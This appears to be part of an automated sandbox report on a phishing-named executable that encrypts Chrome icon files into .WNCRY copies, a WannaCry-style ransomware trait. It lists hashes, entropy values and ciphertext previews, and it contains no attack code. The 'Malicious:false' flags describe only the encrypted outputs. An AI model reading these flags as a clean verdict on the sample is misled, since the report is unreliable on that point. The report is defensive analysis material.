                                                          SSDEEP:48:bkladxPhtEKTuhU5KYool8l3JW0N+a6xn52WeDKg:oexpTuU5KR4i5W0+j3g
                                                          MD5:92923BB81741AF4495A0864F9C9AFEEA
                                                          SHA1:9CBC58FD945181FFE6F64900ABA394B958914F3B
                                                          SHA-256:73FAC76986B693965DC032414860A653E9E7EA9EE28B1660F6E7DBAA6ADB1B0B
                                                          SHA-512:2253726DB916AB2C12B486BA55B1634C15EDF326B65EE6FDAD2E683267D6AEF54A9A0F7A8A0251AF89A2180A6CA1FD0CD74A23C9DAC57DF1A830E8E484761CA9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Oa9`P..<........6Z.:-......Vl....;O...v..._.u..y..N..o..M...=1..".M.%..m..9#e..m[...%.5..|.|4_.y.D.I.4.%{.|.)..m...Q.1~..7..VS.~I...../w.!.....\....sd../,...M.4..z,.*.Oaqs5..#.......'.h..{].P.....sU..)G...G..b........3.qFM~_..<C.hN.Z|.N:.W~".............je"a3....g*$.;.z.{.0..N'.x.....=.NH..s.9.L.FJ.!...JuG."...5Ij.c.P.....~..5..&....s.\.}..'.Xn`rJ....us.n....P......-]....Q..Y..]L.-'3...UJ.K_../%L..S./P...p[........x.q....;%...3.R.-.......C....l....gE^N..5t.._...$.J.b.|K..1...g5..i.G..) .v.......3$.....O................Bgf...h...q%'..6..x...L.6......W#...c..W.t..sYu.....L....j.}H.+....."...J.-j.$>..T...P...b&?SL-....M..&."H.......[T6t.V?.R|.....P...>...=......7..1.X.........A.C.ee..P.J%P..^l....N.. ..[......... .../..Vt~.m%l...92....'.q..mU......2/.{*..<.2c.d9.....n.5*.+.9p....Bv|..U..........E..#.."......9......]....(.a.T..w..y.GU...4.&....p..=.].4h.4..n'."..#....*.~.../2.B..8..k....6F.x_.1`.9.|.@......]\..A.o.q.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1784
                                                          Entropy (8bit):7.889098158309454
                                                          Encrypted:false
                                                          SSDEEP:48:bkladxPhtEKTuhU5KYool8l3JW0N+a6xn52WeDKg:oexpTuU5KR4i5W0+j3g
                                                          MD5:92923BB81741AF4495A0864F9C9AFEEA
                                                          SHA1:9CBC58FD945181FFE6F64900ABA394B958914F3B
                                                          SHA-256:73FAC76986B693965DC032414860A653E9E7EA9EE28B1660F6E7DBAA6ADB1B0B
                                                          SHA-512:2253726DB916AB2C12B486BA55B1634C15EDF326B65EE6FDAD2E683267D6AEF54A9A0F7A8A0251AF89A2180A6CA1FD0CD74A23C9DAC57DF1A830E8E484761CA9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Oa9`P..<........6Z.:-......Vl....;O...v..._.u..y..N..o..M...=1..".M.%..m..9#e..m[...%.5..|.|4_.y.D.I.4.%{.|.)..m...Q.1~..7..VS.~I...../w.!.....\....sd../,...M.4..z,.*.Oaqs5..#.......'.h..{].P.....sU..)G...G..b........3.qFM~_..<C.hN.Z|.N:.W~".............je"a3....g*$.;.z.{.0..N'.x.....=.NH..s.9.L.FJ.!...JuG."...5Ij.c.P.....~..5..&....s.\.}..'.Xn`rJ....us.n....P......-]....Q..Y..]L.-'3...UJ.K_../%L..S./P...p[........x.q....;%...3.R.-.......C....l....gE^N..5t.._...$.J.b.|K..1...g5..i.G..) .v.......3$.....O................Bgf...h...q%'..6..x...L.6......W#...c..W.t..sYu.....L....j.}H.+....."...J.-j.$>..T...P...b&?SL-....M..&."H.......[T6t.V?.R|.....P...>...=......7..1.X.........A.C.ee..P.J%P..^l....N.. ..[......... .../..Vt~.m%l...92....'.q..mU......2/.{*..<.2c.d9.....n.5*.+.9p....Bv|..U..........E..#.."......9......]....(.a.T..w..y.GU...4.&....p..=.].4h.4..n'."..#....*.~.../2.B..8..k....6F.x_.1`.9.|.@......]\..A.o.q.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2696
                                                          Entropy (8bit):7.931686048642344
                                                          Encrypted:false
                                                          SSDEEP:48:bkIdblrD0SgpgzpqeS2hCNbdX383YLM+MNrGm/6JmOQ+bwDzRM:oicSgpgzp3oB3ZqhX/60+bCRM
                                                          MD5:C9664D7AD00F61DBA3FEAA345A372C87
                                                          SHA1:781BDAE991D856C53AFB345AB05BE07277CB2628
                                                          SHA-256:C66EAA5BF051F41281C4366195776B977D269D97DE0554BA08F708D92E6EFC6A
                                                          SHA-512:C1CBE4CE3121E218C5B4FE37983EA684F89097AE825D1C531BE4604085FBC23D58CFCB5B738E01401EB4D153FFDDCE60FF4D3EB330976FB85B63E096CC5277D0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........-'..%......o%.....L....-dI.`....b~......DM*p[.q..Y./|..F.rib.....L._..-..N.Q.BU`..].rcAj.$.....hC..9..L.j8#jv.9....`.....6..Mv...;{...L.*.....:...A...<.&.+.(X..G...R.}v@....J...8.....k...;.CN.JN.......D.E.....t....M.Xo.L.]u4....E8....o....m.......T.cB...O..!..T....c..3..vbF.X...@..O.$M.qy.v]..GZ.8.~...*.|.`U......y1.n~..-"|.V...... IN2..{..P..ekM.._k..y...{%.S.c.>...v..&`h/.(....*#.s....MO.b..I..kVw....f".r..gh....D.X.[+..w..7..\.EkC..'PB3.cS9x6.t....J.........V.X&....6.l>...9..eM-e..d..X.c....Ms...E....+03.K.L.t..4B3..S...v.d.........m.x..q(.....W....3..8.a..:.].$n........?:..%l\I.3..P.;. ..qo.^Oo.N..g........D...!.D.w....u.#......O...I<...Y.....}.!...9.f.(.$..M1...........Mk.........C...m...z.?....L..6>.E.J.75y.<........X(>..z.g...@....$>Ra..M........S5.^.....#.f.e..&/}2..9.Y.....jur....|..%J..?R..M......mX.;=...z&'.;.1.a.Z.Ar.8x..v.V:6C....T.\b(~.[O.k..f..+..f....r....X|....[........W.....=@s....<.f].75...3x..~..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2696
                                                          Entropy (8bit):7.931686048642344
                                                          Encrypted:false
                                                          SSDEEP:48:bkIdblrD0SgpgzpqeS2hCNbdX383YLM+MNrGm/6JmOQ+bwDzRM:oicSgpgzp3oB3ZqhX/60+bCRM
                                                          MD5:C9664D7AD00F61DBA3FEAA345A372C87
                                                          SHA1:781BDAE991D856C53AFB345AB05BE07277CB2628
                                                          SHA-256:C66EAA5BF051F41281C4366195776B977D269D97DE0554BA08F708D92E6EFC6A
                                                          SHA-512:C1CBE4CE3121E218C5B4FE37983EA684F89097AE825D1C531BE4604085FBC23D58CFCB5B738E01401EB4D153FFDDCE60FF4D3EB330976FB85B63E096CC5277D0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........-'..%......o%.....L....-dI.`....b~......DM*p[.q..Y./|..F.rib.....L._..-..N.Q.BU`..].rcAj.$.....hC..9..L.j8#jv.9....`.....6..Mv...;{...L.*.....:...A...<.&.+.(X..G...R.}v@....J...8.....k...;.CN.JN.......D.E.....t....M.Xo.L.]u4....E8....o....m.......T.cB...O..!..T....c..3..vbF.X...@..O.$M.qy.v]..GZ.8.~...*.|.`U......y1.n~..-"|.V...... IN2..{..P..ekM.._k..y...{%.S.c.>...v..&`h/.(....*#.s....MO.b..I..kVw....f".r..gh....D.X.[+..w..7..\.EkC..'PB3.cS9x6.t....J.........V.X&....6.l>...9..eM-e..d..X.c....Ms...E....+03.K.L.t..4B3..S...v.d.........m.x..q(.....W....3..8.a..:.].$n........?:..%l\I.3..P.;. ..qo.^Oo.N..g........D...!.D.w....u.#......O...I<...Y.....}.!...9.f.(.$..M1...........Mk.........C...m...z.?....L..6>.E.J.75y.<........X(>..z.g...@....$>Ra..M........S5.^.....#.f.e..&/}2..9.Y.....jur....|..%J..?R..M......mX.;=...z&'.;.1.a.Z.Ar.8x..v.V:6C....T.\b(~.[O.k..f..+..f....r....X|....[........W.....=@s....<.f].75...3x..~..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4072
                                                          Entropy (8bit):7.958146459709032
                                                          Encrypted:false
                                                          SSDEEP:96:oNc672/lA2H5PNZAFP7vNnGalRxdJ5sayDU8LVAKvm2S18zLFur:n672/C05PNG1hb3O+Am2OUS
                                                          MD5:961AAD31974B78A42316DFD33E2A9C52
                                                          SHA1:9BC6C217300813B94151A2754DC9C29C07029B7F
                                                          SHA-256:CC69CECB3368CED2530A9FD6962243F5B081874493CDD93889D9C0389AEBC937
                                                          SHA-512:96F982E58EF99677BE66D6FA3F8045977BE5377B3E1EEED22F9A71C2CE1006ABB5A996C5A7CC86CB0302DB1AF1E3A7B194F37BC93B10A674AC78C4F173A7B2A8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......Hk....n......O.._g..n.......\...jJ...P. j............>.cK.]i.*_a.R(..c.cM7.........p^.I ........$.Ot......Bu......8x..R..)...h...9..[<..'..s......$..\..<..*..S;..k.d....,;|<...H.B.B$.L...Z....d....O[os>...c..|(..*1....@+....T..8t.=.'W..............e...67#...w.nb2.]*T~...2.J5!...b.C.......b.{.......Pm.*...chF.m...@.B.......z.V.i=gMJ...4Bl....<.P..lVLK.0...m.H...?..+c..8m....ma.< j.X.2.<............W ..7.......".pL..g..n-....].z.....v.E..._..i{./..\?..>..Ue.L\.T{.......Wr|.[.8...j.]l.R.B...x...]..K>...r....I.;-...qCr;.A...7\....f....X.p.Ly..7.......g.]..?.uS6XFd....A/....q..G....e...{.{.<y.@?C ..e(.........#.w%.L..M..`.z~.."?i..y..Q...l$53O..........xLE.v;Q.).....7*}/OPt..#...c..,.*.{.~..$.,.`..!......<{LZ..i.VW....m.6..!..m:\"J.~..x..%.3.YV.(..oo.a....i.!xB.q..HQ.nx}'.F.].7..0......7j.f.q%g..p...F..W..{\\.Z.6.}s.V..a.......iK..:.}H.-..cI.....R.2..v.n.Y3....f.e,.....*1..Q.=....*`=D..I.......,~t.4.Wr..a..ltJ.r3...-e..AK3.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4072
                                                          Entropy (8bit):7.958146459709032
                                                          Encrypted:false
                                                          SSDEEP:96:oNc672/lA2H5PNZAFP7vNnGalRxdJ5sayDU8LVAKvm2S18zLFur:n672/C05PNG1hb3O+Am2OUS
                                                          MD5:961AAD31974B78A42316DFD33E2A9C52
                                                          SHA1:9BC6C217300813B94151A2754DC9C29C07029B7F
                                                          SHA-256:CC69CECB3368CED2530A9FD6962243F5B081874493CDD93889D9C0389AEBC937
                                                          SHA-512:96F982E58EF99677BE66D6FA3F8045977BE5377B3E1EEED22F9A71C2CE1006ABB5A996C5A7CC86CB0302DB1AF1E3A7B194F37BC93B10A674AC78C4F173A7B2A8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......Hk....n......O.._g..n.......\...jJ...P. j............>.cK.]i.*_a.R(..c.cM7.........p^.I ........$.Ot......Bu......8x..R..)...h...9..[<..'..s......$..\..<..*..S;..k.d....,;|<...H.B.B$.L...Z....d....O[os>...c..|(..*1....@+....T..8t.=.'W..............e...67#...w.nb2.]*T~...2.J5!...b.C.......b.{.......Pm.*...chF.m...@.B.......z.V.i=gMJ...4Bl....<.P..lVLK.0...m.H...?..+c..8m....ma.< j.X.2.<............W ..7.......".pL..g..n-....].z.....v.E..._..i{./..\?..>..Ue.L\.T{.......Wr|.[.8...j.]l.R.B...x...]..K>...r....I.;-...qCr;.A...7\....f....X.p.Ly..7.......g.]..?.uS6XFd....A/....q..G....e...{.{.<y.@?C ..e(.........#.w%.L..M..`.z~.."?i..y..Q...l$53O..........xLE.v;Q.).....7*}/OPt..#...c..,.*.{.~..$.,.`..!......<{LZ..i.VW....m.6..!..m:\"J.~..x..%.3.YV.(..oo.a....i.!xB.q..HQ.nx}'.F.].7..0......7j.f.q%g..p...F..W..{\\.Z.6.}s.V..a.......iK..:.}H.-..cI.....R.2..v.n.Y3....f.e,.....*1..Q.=....*`=D..I.......,~t.4.Wr..a..ltJ.r3...-e..AK3.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7000
                                                          Entropy (8bit):7.973103432139965
                                                          Encrypted:false
                                                          SSDEEP:192:HleKCK9X4oeuIGCFKl+COvH6F/K9DvsdsS5MbS80et:HqKUgt8CSu/mDvsd9sT
                                                          MD5:F088898F1ED64032A077C422A7895560
                                                          SHA1:92826C8BAAD83B2465C85D611EEADDC99AD10625
                                                          SHA-256:E2BBEEC8DFA270D6958AE9422C98BAB85BF536B8A61C75AF57EF36ABFF371F34
                                                          SHA-512:C5C27A3B5377C514FCCA751C9F297441C3FCBDAAD39E03089D89255FCFBD2EA40166DAA396F7AD9305F98F3464CBB15060DE89F9EAFA440DF1DC2EDDE339713C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....N..$)..oQ..L..,=.9.....u;..$..]..H.[.!.%.5.3.h.....% .....a1D....P.2J..A..S...q...$.E....}.D;d.O.....%b$.^.)..9{.Lp@...Y.a(..%.U......E.6F.$oW.Q....EM..Y;o1iC....`qd...).`J.aE..h.a....=...P..Q.....BatR\K-..O.O.A.'_*..9D... ...Z..~b..g:.".TV.=......;.......y....H%....C...A.raV.......[F...\.....[..+..U`,...-a.a42....Gho_Gd..H...S..FHY..,$....#A...515Q.(.o+~.....:z.....s....8@...].'.$I.M/.g_.....o.B......-2z...|....]...&..T...qY..Z.a4...<".N.j.A.....4.4J..S......O.}..pq...1.S~y....};..`.......M.\.h.Gs.~...{.?\&..-.?.r..$....|..0q.]X....7...A,.....O...L...Kk6....l....3].._s+..D..'5B.p.n...H.zR.$.(..h...fo.;.g^KdD.....l$.*2c>..,v.cy....%.u...'4^O.[k...ml..R...*...7,...........+....y.*=.....|..#D.)6..>.kql..+......R...*.T..<V....>..U.%..).....r....h= ...H..../..:\.4..*.w.sK....F...........~.:u.......V9.. ..)d.)..#.a..L.N....^..S.sj.s..9.C.h...h..../3.0....Q..~.......S.=Obvj.F5.o#..............X.e..,>......*.......QQ.5t....iS..Y.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7000
                                                          Entropy (8bit):7.973103432139965
                                                          Encrypted:false
                                                          SSDEEP:192:HleKCK9X4oeuIGCFKl+COvH6F/K9DvsdsS5MbS80et:HqKUgt8CSu/mDvsd9sT
                                                          MD5:F088898F1ED64032A077C422A7895560
                                                          SHA1:92826C8BAAD83B2465C85D611EEADDC99AD10625
                                                          SHA-256:E2BBEEC8DFA270D6958AE9422C98BAB85BF536B8A61C75AF57EF36ABFF371F34
                                                          SHA-512:C5C27A3B5377C514FCCA751C9F297441C3FCBDAAD39E03089D89255FCFBD2EA40166DAA396F7AD9305F98F3464CBB15060DE89F9EAFA440DF1DC2EDDE339713C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....N..$)..oQ..L..,=.9.....u;..$..]..H.[.!.%.5.3.h.....% .....a1D....P.2J..A..S...q...$.E....}.D;d.O.....%b$.^.)..9{.Lp@...Y.a(..%.U......E.6F.$oW.Q....EM..Y;o1iC....`qd...).`J.aE..h.a....=...P..Q.....BatR\K-..O.O.A.'_*..9D... ...Z..~b..g:.".TV.=......;.......y....H%....C...A.raV.......[F...\.....[..+..U`,...-a.a42....Gho_Gd..H...S..FHY..,$....#A...515Q.(.o+~.....:z.....s....8@...].'.$I.M/.g_.....o.B......-2z...|....]...&..T...qY..Z.a4...<".N.j.A.....4.4J..S......O.}..pq...1.S~y....};..`.......M.\.h.Gs.~...{.?\&..-.?.r..$....|..0q.]X....7...A,.....O...L...Kk6....l....3].._s+..D..'5B.p.n...H.zR.$.(..h...fo.;.g^KdD.....l$.*2c>..,v.cy....%.u...'4^O.[k...ml..R...*...7,...........+....y.*=.....|..#D.)6..>.kql..+......R...*.T..<V....>..U.%..).....r....h= ...H..../..:\.4..*.w.sK....F...........~.:u.......V9.. ..)d.)..#.a..L.N....^..S.sj.s..9.C.h...h..../3.0....Q..~.......S.=Obvj.F5.o#..............X.e..,>......*.......QQ.5t....iS..Y.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2600
                                                          Entropy (8bit):7.924568907519894
                                                          Encrypted:false
                                                          SSDEEP:48:bkGGVJ05SHKS5zTu1TCVFXO7LEqSe2Z6tMrfA9ZnWMkl7U2PvptqIE6:oE8rM1/2Z473nr8nDX
                                                          MD5:CD9F6171D4630B1BEDD643C6117A4C15
                                                          SHA1:59E528FCB48E21933AC3E959189A691D80CE6496
                                                          SHA-256:07939355FD1394A8B9BEE78566EB84F28AD5243CD7B9610D851B0AF085EA41F6
                                                          SHA-512:AE821C1518CC7A420680601D2FBD1EFA67066FC9B5965704E5B34F40270EC296B4E30942B1EAED62C1FF3CD81C579B9F45E9C3D99AC1A232269952CEA1467663
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....M...Da.p>.Z){.w.vs..r....7c-..e..NP..a.b..............@W..qNC.W...:.22...|.x2...x..Y....)...1}.dt......P,...L..........*.gd.....9,..J.`..[.J..U....%d... .....?B\6...../...A.Tx.H,...8u..I.XD#V..j..Z....r.~..u..I..f.2..&....x..{'w.X.z....Ic.e.!*|............d-..N..#)..._!...D|!..T3....ea.v...... ..1...3.b..5.5....{}<.)..?..^.:;F.5.\.9@4........E.....]......F...B+3Cxy.y5......$..~.....RF.<..4N..8.ry..u...&f!...w... .nO...v;.j......I.O$..x.xZ....g..>)J....+.0...kJN...J...d..Z....u<o..li.......o....R...oX..../...;<..tD..'.3b..r.!.r.6i..>.0.~Z..[..........Z[...b6.B...Y..,...R..p1'..V..@......i...*...6(.)..M. 1..y....AE?...-.R..G.`.......\.(l\h.K....FQ...D{.........w...E!]....<.n.R.T~.,...1.V.b?!...O.....<.T.6.l.q!.1*."=..RU...c...M4iT.^E]&.l...]$..My..;.....:.h.f.. .r.V.v.P..U4iX..%Y.5.[--r.>a.8.OF.GL........].h.A..J..........@J.=..y..g."TZ......V.{.f..i.5....~...X...s.Z]L.!.+-...._....<..6...T...gZ.N.o..7....,..w,A.^I..."...

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2600
                                                          Entropy (8bit):7.924568907519894
                                                          Encrypted:false
                                                          SSDEEP:48:bkGGVJ05SHKS5zTu1TCVFXO7LEqSe2Z6tMrfA9ZnWMkl7U2PvptqIE6:oE8rM1/2Z473nr8nDX
                                                          MD5:CD9F6171D4630B1BEDD643C6117A4C15
                                                          SHA1:59E528FCB48E21933AC3E959189A691D80CE6496
                                                          SHA-256:07939355FD1394A8B9BEE78566EB84F28AD5243CD7B9610D851B0AF085EA41F6
                                                          SHA-512:AE821C1518CC7A420680601D2FBD1EFA67066FC9B5965704E5B34F40270EC296B4E30942B1EAED62C1FF3CD81C579B9F45E9C3D99AC1A232269952CEA1467663
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....M...Da.p>.Z){.w.vs..r....7c-..e..NP..a.b..............@W..qNC.W...:.22...|.x2...x..Y....)...1}.dt......P,...L..........*.gd.....9,..J.`..[.J..U....%d... .....?B\6...../...A.Tx.H,...8u..I.XD#V..j..Z....r.~..u..I..f.2..&....x..{'w.X.z....Ic.e.!*|............d-..N..#)..._!...D|!..T3....ea.v...... ..1...3.b..5.5....{}<.)..?..^.:;F.5.\.9@4........E.....]......F...B+3Cxy.y5......$..~.....RF.<..4N..8.ry..u...&f!...w... .nO...v;.j......I.O$..x.xZ....g..>)J....+.0...kJN...J...d..Z....u<o..li.......o....R...oX..../...;<..tD..'.3b..r.!.r.6i..>.0.~Z..[..........Z[...b6.B...Y..,...R..p1'..V..@......i...*...6(.)..M. 1..y....AE?...-.R..G.`.......\.(l\h.K....FQ...D{.........w...E!]....<.n.R.T~.,...1.V.b?!...O.....<.T.6.l.q!.1*."=..RU...c...M4iT.^E]&.l...]$..My..;.....:.h.f.. .r.V.v.P..U4iX..%Y.5.[--r.>a.8.OF.GL........].h.A..J..........@J.=..y..g."TZ......V.{.f..i.5....~...X...s.Z]L.!.+-...._....<..6...T...gZ.N.o..7....,..w,A.^I..."...

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1576
                                                          Entropy (8bit):7.859725027112348
                                                          Encrypted:false
                                                          SSDEEP:48:bk7zjPFxiVljfhajJpEUP48npdRqAT2oqp6XDhGqf426D:ofJxyld8pfMi2oqIXD742A
                                                          MD5:D1467EF0FA8F2EE7C4A037A3AAF10D67
                                                          SHA1:1367522B6E663EBA4559BA1EB8E52F6627358AEE
                                                          SHA-256:285C08022843C40AB826487598B6609417C05F97E3DD3EB1D820633B1E9E63B9
                                                          SHA-512:AB88449B1F76AC16BF06B644FE07AFC7360CC99990E715797B7522FFCAB45A96AF5741B3944397403ACD38F2D0F5104E60CDAEBEB9F38565B037FDC211E284D7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....S.H...w.\b...BF.i.L&>..%.U....=.8_v.._..8^.=&... ........{Eob. .%.T(y8&c.>X.=.'..\)(..o?3..HA.N7...H...2...I...,E.Vi.}.Z..*.r...9..C...B....P..M.jX...n..fH..R.......6......kE1..1....=k..'.7..*.q....C.&?.Q... .......(....:..^..,i;.@5...f...F.4.K....................y8....V.O...T...Nz.Q...........Hu..d..e....r.@.......K..e7..[F.v.....A.d<....;f:.W.5.5..&..'..0...k..i...C.V....I9b...".+.A.4.....o.....\.3oXJj..h...`..L.PuH.+.L..9...AV.PE...........\.X......?.tXW.[.3w......V2..-.:...5.....]%Vi....jrSZ.....X.?..W.b.Z..<........!Z....j...Y..@.-.J.y.u.E..2M.....i...".....u....z/..5@v.......X[.J6...DH.D.E5zN!.....*...3./cP.....A,......Z;...{7`..w*.".".K....B.^2...*..........]d.`.....Y.G{.....I..K..........m+.C[...X..K.f@U...x+..=.=b....f\.}As.{ #[.m...[,..*.z.\.~..C".Of.\....^....O?rR_.9.d..... S....Z..).....G.....RD.d_<).`.L.X.MO..H...D.@..p.I.SC].:... .......w..:|W..v....*..i.. -4};.......4..1}5N3\..\...&......3...i~..oj.....c..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1576
                                                          Entropy (8bit):7.859725027112348
                                                          Encrypted:false
                                                          SSDEEP:48:bk7zjPFxiVljfhajJpEUP48npdRqAT2oqp6XDhGqf426D:ofJxyld8pfMi2oqIXD742A
                                                          MD5:D1467EF0FA8F2EE7C4A037A3AAF10D67
                                                          SHA1:1367522B6E663EBA4559BA1EB8E52F6627358AEE
                                                          SHA-256:285C08022843C40AB826487598B6609417C05F97E3DD3EB1D820633B1E9E63B9
                                                          SHA-512:AB88449B1F76AC16BF06B644FE07AFC7360CC99990E715797B7522FFCAB45A96AF5741B3944397403ACD38F2D0F5104E60CDAEBEB9F38565B037FDC211E284D7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....S.H...w.\b...BF.i.L&>..%.U....=.8_v.._..8^.=&... ........{Eob. .%.T(y8&c.>X.=.'..\)(..o?3..HA.N7...H...2...I...,E.Vi.}.Z..*.r...9..C...B....P..M.jX...n..fH..R.......6......kE1..1....=k..'.7..*.q....C.&?.Q... .......(....:..^..,i;.@5...f...F.4.K....................y8....V.O...T...Nz.Q...........Hu..d..e....r.@.......K..e7..[F.v.....A.d<....;f:.W.5.5..&..'..0...k..i...C.V....I9b...".+.A.4.....o.....\.3oXJj..h...`..L.PuH.+.L..9...AV.PE...........\.X......?.tXW.[.3w......V2..-.:...5.....]%Vi....jrSZ.....X.?..W.b.Z..<........!Z....j...Y..@.-.J.y.u.E..2M.....i...".....u....z/..5@v.......X[.J6...DH.D.E5zN!.....*...3./cP.....A,......Z;...{7`..w*.".".K....B.^2...*..........]d.`.....Y.G{.....I..K..........m+.C[...X..K.f@U...x+..=.=b....f\.}As.{ #[.m...[,..*.z.\.~..C".Of.\....^....O?rR_.9.d..... S....Z..).....G.....RD.d_<).`.L.X.MO..H...D.@..p.I.SC].:... .......w..:|W..v....*..i.. -4};.......4..1}5N3\..\...&......3...i~..oj.....c..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5480
                                                          Entropy (8bit):7.969839016170105
                                                          Encrypted:false
                                                          SSDEEP:96:oZiV57mA9LLVJtzLNpaom1og59i3jpZeeSGx6MJPH72x7fL51POv13+BVwOrvRNA:si/mA9LZnHat6tTSG8M9Y7fTOvEBVwOI
                                                          MD5:A4BB551A4B91BC7FF553D103DDE8392F
                                                          SHA1:04876A77099A254026E4750917544A93AF745B52
                                                          SHA-256:C49C315FCDB9FF2CC8A1CC93C7751AB78E28F92449A44038488B15A853FCE0F9
                                                          SHA-512:6F0075F554CDF8D4D2276C88CF7B1A222EAEE04F5F672FDF9856E1466F43144D7324BBF6632E4240908316114E536E4926B47C7FE6A003518A543DE230922338
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......iYN.s.].(...lX.......9C..U.?.>.......*......IZ.d_.E!.v....G.4...z...?_..N.GO,..3y-X.....U.._.=..X.i....).@o...p)=wv.4.Uli..e2y..o....(..tc.n(.c\.Ud...&.>.l!B..+....3..K.5p.-dV....o....LC.u..=..x}....\O%E.i12..I.x...n.Wk..[. .\.[3#>.,.9.....G.........h..[....a^ns..{M...|X.*....eAc!..U.}l.-X..Gw:.N.......=...2|.D..v.....@.?...O.HB.IlvQa..K"=.....U..ou.#9........6.|.4....W.]...|.'"~.#..,?.z..Q$..5d!...,K0...l.3...G..x.V......:.\.:.n(..L.v%92D....&.6....Y...qV.4_...........q.N.:-.OC..y..{.GC....PP....(.......6..Uf.....b.pu...OY..c..]........z..._....8..S.#q./.m`.I^.........+..aZ.E.C.)...t.*..^.......N.W.k...5..;bFob.e|.......d;.4A.L=..X$.-..6.u4.B.G...95..w.c.F.....VMV...p~.}.QA.q..%E`.c.....M1."K....^..] .Ca~.%.....f,...Z^w.r$Y...*.%...3c."...S.......La.C...._z........._...../"...On9O.>..4#.[......f.Q.:1..;...f.L.r...L.t..h..U.I......=./.g8d_+..0..5..8QCw.6..n.Z.H..o1Xk.....Ls.8....=O...0.._.X.'...p..+..XB.`.>P%.z.,g.....

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png.WNCRYT

                                                          Download File
